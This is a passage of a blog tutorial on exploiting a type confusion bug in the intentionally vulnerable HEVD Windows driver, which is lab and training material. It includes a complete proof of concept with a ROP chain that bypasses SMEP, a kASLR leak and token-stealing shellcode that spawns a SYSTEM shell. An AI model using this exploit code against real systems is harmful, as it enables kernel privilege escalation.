In the previous post, we walked through some of the mitigations implemented in Windows. Now let’s get started with exploiting some kernel driver vulnerabilities in HEVD.

Table of Contents

Type Confusion Vulnerability
IDA Analysis
Exploitation
Error 1: EXCEPTION_DOUBLE_FAULT
Error 2: IRQL_NOT_LESS_OR_EQUAL
Use-After-Free Vulnerability
IDA Analysis
AllocateUaFObjectNonPagedPool
FreeUaFObjectNonPagedPool
UseUaFObjectNonPagedPool
AllocateFakeObjectNonPagedPool
Exploitation

Type Confusion Vulnerability

HEVD has a dedicated handler for the Type Confusion vulnerability, TypeConfusionIoctlHandler, whose IOCTL code is 0x222023.

Before getting into the vulnerability, let’s learn a bit about what type casting is.

Type casting in C/C++ is converting a variable from one data type to another. The purpose of type casting in C/C++ is to allow compatibility between different data types, enabling operations, comparisons, or assignments that wouldn't be allowed otherwise.

For example, you can cast an int to a float to perform floating-point calculations, or cast a void* to a specific pointer type to access its data.

There are different types of casting in C/C++, the classic C-style casting which is applicable for C++ too:

int a = 10;
float b = (float)a; // C-style cast

This is C++ static_cast type casting method:

int a = 10;
float b = static_cast<float>(a); // C++ static_cast

The others are dynamic_cast, const_cast, and reinterpret_cast; each one is meant for a different scenario. They also differ in whether checks happen at compile time or at runtime to ensure safe and intended behavior.

A C-style cast is not type-safe: the compiler accepts almost any conversion, so a mistake only shows up at runtime as undefined behavior. static_cast is checked by the compiler but not at runtime, so an incorrect downcast is still dangerous. dynamic_cast is checked at runtime, which makes it safer, but it adds runtime overhead and only works with polymorphic types, so it is used more sparingly.

IDA Analysis

Things go wrong when data is interpreted as the wrong type. Back to TypeConfusionIoctlHandler: this function calls TriggerTypeConfusion with the user input (IO_STACK_LOCATION→Parameters.DeviceIoControl.Type3InputBuffer == IrpSp+0x20).

The TriggerTypeConfusion function takes one argument, a pointer to the user input, which is a USER_TYPE_CONFUSION_OBJECT structure. This structure contains two members: ObjectID and ObjectType.

So the user input is a 0x10-byte structure (USER_TYPE_CONFUSION_OBJECT), referred to as the UserTypeConfusionObject variable, which is then moved to the RBX register (1️⃣) [ RBX = UserTypeConfusionObject (USER_TYPE_CONFUSION_OBJECT) ].

Moving on, there is a call to the ExAllocatePoolWithTag() API 2️⃣, which allocates pool memory of the specified type and returns a pointer to the allocated block. Based on the arguments passed to it, it allocates 0x10 bytes of NonPagedPool here.

Interestingly, it type-casts the returned pointer (PVOID) of ExAllocatePoolWithTag to _KERNEL_TYPE_CONFUSION_OBJECT. In assembly you won’t see this cast; the returned address is simply copied into the PoolWithTag variable (mov r14, rax 3️⃣, where r14 is PoolWithTag 1️⃣, a _KERNEL_TYPE_CONFUSION_OBJECT structure) [ R14 = PoolWithTag (KERNEL_TYPE_CONFUSION_OBJECT) ].

In assembly, everything boils down to raw bits and bytes. The concept of "types" or “type casting” that we're familiar with from high-level languages (like int, float, char, etc.) simply doesn't exist at the assembly level.

Looking at the _KERNEL_TYPE_CONFUSION_OBJECT structure, it contains two members: the first is ObjectID and the second is a union with two members, ObjectType and Callback.

One thing to know about a union: all of its members share the same memory location, and its size is determined by its largest member. In this case, both ObjectType and Callback are 8 bytes (on 64-bit systems), so they occupy the same 8 bytes.

Moving on, a few operations happen here. First, a quick recap of the registers:

RBX is the pointer to the user input UserTypeConfusionObject, which is an instance of the USER_TYPE_CONFUSION_OBJECT structure.
R14 points to a memory region allocated using ExAllocatePoolWithTag(). This memory is type-cast into PoolWithTag which is a KERNEL_TYPE_CONFUSION_OBJECT structure.

1️⃣ It dereferences RBX, copying the first 8 bytes into RAX. According to USER_TYPE_CONFUSION_OBJECT (UserTypeConfusionObject), the first member is ObjectID, so RAX holds ObjectID.
2️⃣ The value in RAX (ObjectID) is copied to the address pointed to by R14, the newly allocated KERNEL_TYPE_CONFUSION_OBJECT (PoolWithTag) structure, whose first 8 bytes are also ObjectID. In other words, it copies UserTypeConfusionObject->ObjectID to PoolWithTag->ObjectID.
3️⃣ It dereferences RBX+8, fetching the next 8 bytes of USER_TYPE_CONFUSION_OBJECT (the ObjectType member) into RAX.
4️⃣ The value in RAX (now ObjectType) is copied to the address R14+8. This position in KERNEL_TYPE_CONFUSION_OBJECT is a union with two members. Here is the interesting part: both members of this union are 8 bytes, so the stored value can be read as either ObjectType or Callback.

typedef struct _USER_TYPE_CONFUSION_OBJECT {
    unsigned __int64 ObjectID;
    unsigned __int64 ObjectType;
} USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;

typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
    unsigned __int64 ObjectID;
    union {
        unsigned __int64 ObjectType;
        void (*Callback)(void); // function pointer sharing storage with ObjectType
    };
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;

Let’s have a look at how the union causes the type confusion here. As I explained earlier, all members of a union share the same storage, and its size is determined by its largest member. Here is a quick example.

#include <stdio.h>

int main() {

    char secret[10] = "1337";

    union Data {
        void* normalcall;     // 8 bytes
        void* maliciouscall;  // 8 bytes
    };

    union Data data;
    data.normalcall = &secret;

    printf("Size of union: %zu bytes\n", sizeof(data)); // %zu is the size_t format
    printf("normalcall value: %p\n", data.normalcall);
    printf("maliciouscall value: %p\n", data.maliciouscall);
}

We define a union named Data with two members: normalcall and maliciouscall, both of which are pointers (void*), typically 8 bytes on a 64-bit system.
A char array named secret is initialized with the string "1337".
We assign the address of secret to data.normalcall. This means data.normalcall now points to the start of the secret array.
We print the size of the union. Since both members are 8 bytes, the size of the union is 8 bytes, the size of its largest member.
We print the value of data.normalcall, which will show the address of secret.
We then print the value of data.maliciouscall. Even though we never explicitly assigned a value to maliciouscall, let’s see what we get.

By executing the binary,

We get the size of the union, which is 8 bytes.
Next, we see the address stored in normalcall, which points to the address of secret. That seems correct.
Then we print maliciouscall, and it prints the same address. This demonstrates that the union members share the same memory. Because of this, even when the application reads the address through maliciouscall, it gets the address that was stored through normalcall.
This behavior applies regardless of differing data types; it depends on how the application or binary handles the data.

> .\binary.exe
Size of union: 8 bytes
normalcall value: 000000FC539EFCB0
maliciouscall value: 000000FC539EFCB0

In the example above, both members are 8 bytes (void*). However, consider a scenario where one member is an int (4 bytes) and the other is a void* (8 bytes). The overall size would still be 8 bytes, meaning it can hold up to 8 bytes of data. When I say it depends on how the application handles the data, I mean that if the program reads the int, it only takes the first 4 bytes; if it then uses the second member of the union, the void* pointer, it interprets all 8 bytes that were stored. The application can still protect against this by validating which member the data is meant for, for example by rejecting the input if it carries 8 bytes of data where only the 4-byte int is expected.

Back in IDA, there is a call to TypeConfusionObjectInitializer 2️⃣, and just before it 1️⃣ a mov copies the R14 register into RCX (labeled UserTypeConfusionObject). As covered above, R14 is PoolWithTag (_KERNEL_TYPE_CONFUSION_OBJECT), so this structure is passed as the argument to TypeConfusionObjectInitializer.

TypeConfusionObjectInitializer

1️⃣ RCX (the input _KERNEL_TYPE_CONFUSION_OBJECT) is labeled KernelTypeConfusionObject.
2️⃣ KernelTypeConfusionObject is copied to the RBX register.
3️⃣ It then dereferences RBX+8, which is the second member (the union), and calls that value.

We already know that _KERNEL_TYPE_CONFUSION_OBJECT holds 2 members: ObjectID and a union (ObjectType & Callback). If you look at the source code of this function, it makes a call to the Callback member.

typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
    unsigned __int64 ObjectID;
    union {
        unsigned __int64 ObjectType;
        void (*Callback)(void); // function pointer sharing storage with ObjectType
    };
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;

We know that the user input’s (USER_TYPE_CONFUSION_OBJECT) ObjectType is copied to _KERNEL_TYPE_CONFUSION_OBJECT’s ObjectType. Since it is a member of the union, it also shares the same memory space with Callback. As a result, when the call occurs, it actually invokes the value we sent in ObjectType.

Exploitation

Let’s test this theory. I wrote the following code, in which I created a structure called _MY_USER_INPUT; this is what we are going to send to the driver. It contains 2 members, assigned dummy values for now: ObjectID contains 0x4141414141414141 and ObjectType contains 0x4242424242424242.

#include <Windows.h>
#include <stdio.h>
#include "ioctl.h"

typedef struct _MY_USER_INPUT {
    void* ObjectID;
    void* ObjectType; // Callback
} MY_USER_INPUT, *PMY_USER_INPUT;

int main()
{
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %lu\n", GetLastError());
        return 1;
    }

    _MY_USER_INPUT input;
    input.ObjectID = (LPVOID)(0x4141414141414141);
    input.ObjectType = (LPVOID)(0x4242424242424242); // Callback
        
    printf("[+] Calling TYPE_CONFUSION_VULN....");

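    DWORD bytesReturned = 0; // must be non-NULL when lpOverlapped is NULL

    // DeviceIoControl returns a BOOL, not an NTSTATUS
    BOOL success = DeviceIoControl(
        hDriver,
        TYPE_CONFUSION_VULN,
        &input,
        sizeof(input),
        nullptr,
        0,
        &bytesReturned,
        nullptr);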

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }
    return 0;

}

Since we know the IOCTL code that invokes TypeConfusionIoctlHandler, I used an online decoder to get the rest of the information (the raw IOCTL code can also be used directly).

I placed a breakpoint on the call to TriggerTypeConfusion, since our user-mode application reaches it through this IOCTL.

I ran the user-mode application on the debuggee machine and the breakpoint was hit. We can see that RCX contains the pointer to the structure I sent.

Moving on, after the call to ExAllocatePoolWithTag() API, it copies the user input (RBX) to the newly allocated region (R14) PoolWithTag (_KERNEL_TYPE_CONFUSION_OBJECT).

Next comes the call to TypeConfusionObjectInitializer, which takes the pointer to _KERNEL_TYPE_CONFUSION_OBJECT as its argument.

Moving on, we reach the call to [RBX+8] which is the _KERNEL_TYPE_CONFUSION_OBJECT’s second member Callback (union) function. So this means that this function will call whatever pointer we place in the ObjectType field.

Now that we know our attack path, we can try to execute our shellcode. However, SMEP is enabled, so we can’t simply allocate a user-mode region with VirtualAlloc() and pass its address as ObjectType; SMEP will block that. We can try to disable it like before, but ObjectType gives us room for only a single ROP gadget.

So if we find a suitable gadget, we can pivot the stack to user mode and build a fake stack there to execute the rest of our ROP chain and disable SMEP. HVCI is disabled for this scenario.

I found this gadget using ROPgadget. The address 0x83000000 is within user space (on current 64-bit Windows, roughly 0 to 0x00007FFFFFFEFFFF).

0x000000014059f24e : mov esp, 0x83000000 ; ret

I updated the POC. We need to bypass kASLR as well, so I reused the same getbaseaddress() from my previous posts. I used VirtualAlloc() to allocate the region for the fake stack; since we know the address the stack will be pivoted to (0x83000000), I passed it as the starting address (lpAddress) to VirtualAlloc().

#include <Windows.h>
#include <stdio.h>
#include "ioctl.h"
#include <psapi.h>

typedef struct _MY_USER_INPUT {
    void* ObjectID;
    void* ObjectType; // Callback
} MY_USER_INPUT, *PMY_USER_INPUT;

PVOID getbaseaddress()
{
    BOOL status;
    LPVOID* pImageBase;
    DWORD ImageSize;

    status = EnumDeviceDrivers(nullptr, 0, &ImageSize);

    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

    status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);

    LPVOID ntaddr = pImageBase[0];

    return ntaddr;
}

int main()
{
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %lu\n", GetLastError());
        return 1;
    }

    LPVOID nt_addr = getbaseaddress();
    printf("[+] Nt base address: %p\n", nt_addr);

    _MY_USER_INPUT input;
    input.ObjectID = (LPVOID)(0x4141414141414141);
    input.ObjectType = (LPVOID)((uintptr_t)nt_addr + 0x0059f24e); // mov esp, 0x83000000 ; ret

    uintptr_t STACK_PIVOT = 0x83000000;
    LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT), 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("[+] Allocated region: %p\n", fakeStack);
    
    getchar();
    printf("[+] Calling TYPE_CONFUSION_VULN....");

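    DWORD bytesReturned = 0; // must be non-NULL when lpOverlapped is NULL

    // DeviceIoControl returns a BOOL, not an NTSTATUS
    BOOL success = DeviceIoControl(
        hDriver,
        TYPE_CONFUSION_VULN,
        &input,
        sizeof(input),
        nullptr,
        0,
        &bytesReturned,
        nullptr);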

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    return 0;

}

I placed a breakpoint on the call to Callback, and when it attempted to execute our stack pivot gadget, it ended in an error:

Error 1: EXCEPTION_DOUBLE_FAULT

Analyzing the error, it’s an UNEXPECTED_KERNEL_MODE_TRAP and the first parameter (Arg1) shows 0x8 which is EXCEPTION_DOUBLE_FAULT. The third parameter (Arg3) shows the address 0x83000000 where the error occurred.

After some googling and reading the documentation and other researchers’ write-ups, I figured the following might have happened:

Once the stack pivot is performed, the kernel tries to access the user-mode address 0x83000000. Since nothing has been written to this 0x1000-byte region yet, it may have no physical page behind it: it is either not yet faulted in or paged out (paged-out memory has been temporarily moved from RAM to disk to free up space for active processes).
So when the driver accesses 0x83000000, the MMU (memory management unit) walks the page tables to the PTE (Page Table Entry) to find the physical address, and since the page is not present, the CPU raises an exception called a page fault. In our scenario this is the first fault.
To handle a page fault, the current execution context (including registers and the instruction pointer) is saved on the stack in a structure called a trap frame (_KTRAP_FRAME). In our scenario it couldn’t be saved, so a second fault occurred. This is the reason for the EXCEPTION_DOUBLE_FAULT.

Running the !pte command on the virtual address shows zeros, which most likely means the page is not resident, and the page fault occurred to bring it in.

According to the documentation for this bug check, it might have occurred because the kernel tried to use an unmapped region as its stack:

The first cause is a kernel stack overflow. This overflow occurs when a guard page is hit, and the kernel tries to push a trap frame. Because there's no stack left, a stack overflow results, causing the double fault.

Let’s analyze this further. I added getchar() before calling DeviceIoControl() and opened the user-mode application in VMMap.

Using VirtualAlloc() we allocated a 0x1000-byte region starting at 0x83000000. Windows does not manage virtual memory in bytes; it works in pages (4 KB), so even a small request is backed by a whole page. In addition, VirtualAlloc() reserves address space at the allocation granularity, which is typically 64 KB, to keep address-space management efficient.

This is a simple representation of what’s going on. I believe this is what might have happened: the kernel tried to access 0x83000000, the page was not resident, so a page fault occurred and the CPU tried to save the trap frame on the stack. Since the stack grows downwards and 0x83000000 is the very start of the allocated region, the page below it is unmapped, and the EXCEPTION_DOUBLE_FAULT occurred.

The reason I say this might be the cause is that there is something else to consider: the Interrupt Request Level (IRQL). If the CPU is running at a higher IRQL and tries to page in a user-space address, that also leads to a BSOD. More on this in the Error 2 section below.

To solve this issue, we can try the following:

We need to allocate some memory before the stack pivot address (0x83000000) for the trap frame and other kernel operations. Because we pivoted the stack to user space and the kernel keeps using it, it’s better to include this region in our fake stack.
We need to make sure the allocated region is always paged in. We can try this with VirtualLock(), and we can also write some data into the region to make sure it is paged in, although a user-space address can never be guaranteed to stay resident.

This is the updated POC:

Added a page (0x1000, 4 KB) of space before the fake stack and increased the total allocated region to 0x5000.
Used VirtualLock() to page in the memory region and filled the whole allocated region with A’s (some of which I later overwrite with the ROP chain).
After the pivot it lands on my ROP gadgets, which are just NOP; RET, to check that the gadgets execute successfully.

uintptr_t STACK_PIVOT = 0x83000000;
LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x5000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("[+] Allocated region: %p\n", fakeStack);
if (!VirtualLock(fakeStack, 0x5000)) {
    printf("Error using VirtualLock: %d\n", GetLastError());
}
memset(fakeStack, 'A', 0x5000);

int index = 0;
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc); // nop; ret
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);

Back at the call to Callback, I checked the allocated region; this time it’s paged in, and I can see the 3 ROP gadgets too.

Even though everything seemed good, when I executed the stack pivot gadget, it ended in the same EXCEPTION_DOUBLE_FAULT again.

Not only that, the allocated region just below the stack pivot address (< 0x83000000) appears to be paged out.

Memory management is complex. I read a few other researchers’ articles (referenced below), and this is my theory of what’s going on: I allocated a very small region, 0x5000 (20 KB), and even though the VirtualLock() call succeeded, that does not guarantee the pages stay resident. There are scenarios where the memory is silently paged out (like here). So I increased the region to 0x10000 (64 KB); as I explained earlier, Windows works with pages, and address space is handed out in blocks of the allocation granularity, which is typically 64 KB.

uintptr_t STACK_PIVOT = 0x83000000;
LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("[+] Allocated region: %p\n", fakeStack);
if (!VirtualLock(fakeStack, 0x10000)) {
    printf("Error using VirtualLock: %d\n", GetLastError());
}
memset(fakeStack, 'A', 0x10000);

int index = 0;
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc); // nop; ret
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);

After compiling and running the new POC, the allocated region just below the pivot address (< 0x83000000) is resident and shows the A’s I wrote. Following that, the stack pivot gadget executed successfully.

Error 2: IRQL_NOT_LESS_OR_EQUAL

Now that the stack pivot was successful (it reached the ret instruction, which it didn’t previously), it should execute the other ROP gadgets (NOP; RET) from the stack, but that’s not the case.

It ended in IRQL_NOT_LESS_OR_EQUAL. This error occurs only after the stack pivot, when it tries to execute my other ROP gadgets.

Arg1 shows the address that couldn't be accessed and led to the issue.
Arg2 shows the IRQL as 0xFF, and the output itself states (highlighted) that it attempted to access a paged-out or invalid memory region at a raised IRQL.

Let’s briefly go over the Interrupt Request Level (IRQL):

In Windows, an interrupt is a signal from hardware or software indicating an event that needs immediate attention. Interrupts temporarily halt the current code execution, allowing the interrupt handler (a specific routine) to execute. Once the interrupt is handled, the processor resumes the previous task.

The Interrupt Request Level (IRQL) determines the priority of interrupts, and each CPU has its own current IRQL. There are different IRQL levels (the numbers below follow the x86 numbering; x64 uses a 0 to 15 range, with HIGH_LEVEL at 15):

PASSIVE_LEVEL (0) - Normal user-mode/kernel-mode execution.
APC_LEVEL (1) - Asynchronous Procedure Calls.
DISPATCH_LEVEL (2) - Thread scheduling, DPCs.
DIRQL (3-26) - Device interrupts.
POWER_LEVEL (30) - Power failure handling.
HIGH_LEVEL (31) - Used for critical system operations.

Here is a quick example:

When you press a key on the keyboard, the keyboard controller sends an interrupt signal to the CPU.
Let’s say a processor is running regular tasks at a low IRQL (e.g., IRQL = 0, PASSIVE_LEVEL).
The keyboard interrupt is assigned a higher IRQL (a device IRQL, DIRQL, which is above DISPATCH_LEVEL).
The CPU temporarily pauses the low IRQL task, processes the keyboard interrupt, and then resumes the previously interrupted task once the interrupt handling is complete.

The most notable points we need in this situation are:

At Low IRQLs (PASSIVE_LEVEL): The system can handle page faults because it can pause the current thread, fetch the required page from disk, and then resume execution.
At High IRQLs (DISPATCH_LEVEL and above): The system cannot handle page faults because paging operations (disk I/O) will take time. Since high IRQL levels must be serviced immediately and cannot wait for such operations, it could result in a crash (bug check).

Now with that in mind, after some analysis, following is my understanding:

Scenario 1:

Initially, the driver operates at an IRQL below DISPATCH_LEVEL. However, when we interact with this specific IOCTL, under certain conditions the IRQL may be raised above DISPATCH_LEVEL. This escalation will ensure that other processors halt their operations, allowing this task to proceed.
During this high IRQL operation, the driver attempts to access the ROP gadgets located in user-space memory (0x83000000). Even though we tried to lock the memory regions using VirtualLock to prevent paging, as I said earlier there is no guarantee that these pages remain resident in memory at all times.
According to MSDN: When you lock memory with VirtualLock it locks the memory into your process's working set. It doesn't mean that the memory will never be paged out. It just means that the memory won't be paged out as long as there is a thread executing in your process, because a process's working set needs be present in memory only when the process is actually executing.
So if the memory is paged out and a page fault occurs, the system cannot handle the page fault at this elevated IRQL. Consequently, this situation leads to an IRQL_NOT_LESS_OR_EQUAL error, as the system is unable to resolve the page fault while operating at a high IRQL.

I have 2 virtual processors in my machine and as you can see in this scenario, the IRQL is escalated to 13 and caused the IRQL_NOT_LESS_OR_EQUAL error.

Scenario 2:

However, the above scenario is not consistent. There are instances where the exploit works. This might be because the processor accesses the ROP gadgets while the IRQL remains at a lower level. In this scenario, even if the memory is initially paged out, the system can page it back in without any issues, as the lower IRQL allows the page fault to be handled appropriately. As a result, the exploit executes successfully without triggering an IRQL_NOT_LESS_OR_EQUAL error.

As you can see in this scenario, the IRQL didn’t change and the ROP gadget executed successfully:

The results may vary depending on the hardware configuration of different machines. Systems with more RAM and additional processors may experience a higher success rate. In such cases the IRQL might not need to be raised as often, and the system can handle tasks more smoothly.

User-mode cannot control the page-in process. Even if you use VirtualLock or other user-mode methods, the memory may or may not be paged-in, it depends on the system's load. So this concludes:

If the allocated memory is paged-in (stored in physical memory), everything works fine.
If the allocated memory is paged-out (stored in the page file) and a page fault occurs while the IRQL is higher, it cannot handle the page fault, leading to failure.
If the allocated memory is paged-out (stored in the page file) and a page fault occurs while the IRQL is lower, the memory can be paged-in successfully.

If we avoid scenario 1, the exploit works. This depends on the machine’s load and its efficiency.

For the POC below, I used the same ROP gadgets I used to bypass SMEP & VBS in the earlier post (HVCI is disabled).

Let’s start from the beginning. After the stack pivot, it begins executing the ROP chain, and the fake stack frame looks good. It performs the same operations as before to bypass SMEP & VBS: it finds the PTE of the shellcode, flips the “U” flag to “K”, and executes the shellcode.

It worked: exploiting the Type Confusion vulnerability gives a shell as SYSTEM.

Full POC:

#include <Windows.h>
#include <stdio.h>
#include "ioctl.h"
#include <psapi.h>

typedef struct _MY_USER_INPUT {
    void* ObjectID;
    void* ObjectType; // Callback
} MY_USER_INPUT, *PMY_USER_INPUT;

PVOID getbaseaddress()
{
    BOOL status;
    LPVOID* pImageBase;
    DWORD ImageSize;

    status = EnumDeviceDrivers(nullptr, 0, &ImageSize);

    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

    status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);

    LPVOID ntaddr = pImageBase[0];

    return ntaddr;
}

uintptr_t MiGetPte(LPVOID lpMemory) {
    uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory);

    uintptr_t calc1 = addr >> 9; // shr rcx, 9 
    uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx

    return calc2;
}

int main()
{
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %lu\n", GetLastError());
        return 1;
    }

    LPVOID nt_addr = getbaseaddress();
    printf("[+] Nt base address: %p\n", nt_addr);

    BYTE shellcode[256] = {
    0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
    0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
    0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
    0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
    0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
    0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
    0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
    0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
    0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
    0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
    0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
    0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
    0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
    0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff
    };

    LPVOID lpMemory = VirtualAlloc(NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
    printf("[+] Shellcode address: %p\n", lpMemory);
    memcpy(lpMemory, shellcode, sizeof(shellcode));

    uintptr_t ShellcodePte = MiGetPte(lpMemory);
    printf("[+] PTE calculated shellcode address: %p\n", (void*)ShellcodePte);

    _MY_USER_INPUT input;
    input.ObjectID = (LPVOID)(0x4141414141414141);
    input.ObjectType = (LPVOID)((uintptr_t)nt_addr + 0x0059f24e); // mov esp, 0x83000000 ; ret

    uintptr_t STACK_PIVOT = 0x83000000;
    LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("[+] Allocated region: %p\n", fakeStack);
    if (!VirtualLock(fakeStack, 0x10000)) {
        printf("Error using VirtualLock: %d\n", GetLastError());
    }
    memset(fakeStack, 'A', 0x10000); // arguments are (dest, value, size)
    int index = 0;
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc); // nop; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00202e71); // pop rcx; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)ShellcodePte; // PTE offset of the shellcode page (added to the PTE base below)
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201862); // pop rax; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // nt!MiGetPteAddress+0x13
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027bcbf); // mov rax, qword ptr [rax]; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0020e204); // add rax, rcx; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201861); // pop r8 ; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)(0xfffffffffffffffc); // -4
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x003fd49b); // add qword ptr [rax], r8 ; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = lpMemory; // Shellcode in user-mode

    // getchar();
    printf("[+] Calling TYPE_CONFUSION_VULN....");

    BOOL success = DeviceIoControl( // DeviceIoControl returns BOOL, not NTSTATUS
        hDriver,
        TYPE_CONFUSION_VULN,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    printf("[+] Spawning a shell with elevated privileges\n\n");
    system("cmd");

    return 0;

}

Use-After-Free Vulnerability

A Use-After-Free (UAF) vulnerability occurs when a program continues to use a pointer to a memory region that has already been freed. It arises when the reference to the freed memory is not set to NULL after the free, so the program can still reach the region through the stale pointer. If the freed memory is reallocated for another purpose in the meantime, using the old pointer leads to undefined behavior and potentially arbitrary code execution. Such a stale pointer is also called a dangling pointer.

In HEVD, we will use multiple functions to perform the UAF attack:

AllocateUaFObjectNonPagedPool (0x222013) - This function allocates 0x60 bytes from the NonPagedPool with the tag “Hack” and stores the pointer to the region in a global variable.
FreeUaFObjectNonPagedPool (0x22201B) - This function frees the allocated region through the global variable but forgets to set the global variable to NULL, which leaves it as a dangling pointer.
